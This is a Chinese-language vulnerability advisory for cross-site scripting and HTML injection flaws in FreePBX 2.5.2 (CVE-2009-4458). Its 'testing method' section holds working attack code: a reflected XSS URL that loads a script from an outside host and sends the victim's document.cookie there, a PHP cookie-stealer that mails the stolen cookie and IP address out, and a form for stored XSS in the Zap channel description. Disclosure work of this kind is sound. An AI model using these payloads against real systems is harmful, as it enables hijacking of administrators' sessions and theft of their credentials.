FreePBX多个跨站脚本和HTML注入漏洞
FreePBX多个跨站脚本和HTML注入漏洞
发布日期:2009-12-28
更新日期:2009-12-29
受影响系统:
FreePBX FreePBX 2.5.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 37482
CVE(CAN) ID: CVE-2009-4458
FreePBX之前被称为Asterisk Management Portal,是IP电话工具Asterisk的标准化实现,可提供Web配置界面和其他工具。
当display设置为trunks的时候,FreePBX没有正确地过滤提交给admin/config.php的tech参数便返回给了用户,这可能导致在用户的浏览器会话中执行任意HTML和脚本代码。此外在添加Zap渠道的时候没有正确的过滤提交给Description部分的输入,这可能导致存储式跨站脚本攻击。
<*来源:Global-Evolution
链接:http://secunia.com/advisories/37972/
http://www.exploit-db.com/exploits/10645
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
location.href='https://www.example.com/admin/admin/config.php?display=trunks&tech=%3C/script%3E%20%22%3E
%3Cscript%20src%3Dhttp%3A//global-evolution.info/etc/grep.php%3E%3C/script%3E?nice='+escape(document.cookie)
<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");
$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("[email protected]", $subject, $msg);
header ("location: http://127.0.0.1:8080/admin/");
?>
<form name="editZapchandid" action="" method="post" onsubmit="return checkZapchandid(editZapchandid);">
<input type="hidden" name="extdisplay" value="">
<input type="hidden" name="channel" value="">
<input type="hidden" name="action" value="add">
<table><tr><td colspan="2"><h5>Add Channel<hr></h5></td></tr>
<tr><td><a href="#" class="info">Channel:<span>The Zap Channel number to map to a DID</span></a></td>
<td><input size="5" type="text" name="channel" value="" tabindex="1"></td>
</tr><tr><td><a href="#" class="info">Description:<span>A useful description describing this channel</span></a></td>
<td><input size="40" type="text" name="description" value="INSERT 0WN SCRIPTCODE HERE!!!" tabindex="2"></td>
</tr><tr><td><a href="#" class="info">DID:<span>The DID that this channel represents. The incoming call on this channel
will be treated as if it came in with this DID and can be managed with Inbound Routing on DIDs</span></a></td>
<td><input size="40" type="text" name="did" value="" tabindex="3"/></td>
</tr><tr><td colspan="2"><br><input name="Submit" type="submit" value="Submit Changes" tabindex="4">
</td></tr></table></form>
建议:
--------------------------------------------------------------------------------
厂商补丁:
FreePBX
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: